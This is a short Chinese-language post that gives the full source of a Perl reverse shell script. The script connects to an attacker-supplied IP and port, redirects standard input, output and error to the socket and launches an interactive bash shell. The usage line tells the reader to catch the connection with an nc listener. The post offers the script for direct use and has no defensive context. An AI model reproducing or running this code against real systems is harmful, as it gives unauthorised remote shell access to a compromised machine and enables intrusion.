将下面的代码保存为shell.pl

 1#!/usr/bin/perl -w
 2
 3use strict;
 4use Socket;
 5use IO::Handle;
 6
 7if($#ARGV+1 != 2){
 8print "$#ARGV $0 Remote_IP Remote_Port n";
 9exit 1;
10}
11
12my $remote_ip = $ARGV[0];
13my $remote_port = $ARGV[1];
14
15my $proto = getprotobyname("tcp");
16my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
17
18my $shell = '/bin/bash -i';
19
20socket(SOCK, AF_INET, SOCK_STREAM, $proto);
21
22STDOUT->autoflush(1);
23SOCK->autoflush(1);
24
25connect(SOCK,$pack_addr) or die "can not connect:$!";
26
27open STDIN, "<&SOCK";
28open STDOUT, ">&SOCK";
29open STDERR, ">&SOCK";
30
31print "Enjoy the shell.n";
32
33system($shell);
34close SOCK;
35
36exit 0;

上个效果图先:

perlshell

用法:执行./shell.pl Remote_IP Remote_Port,在远程机器上通过nc -l -p 端口就行了。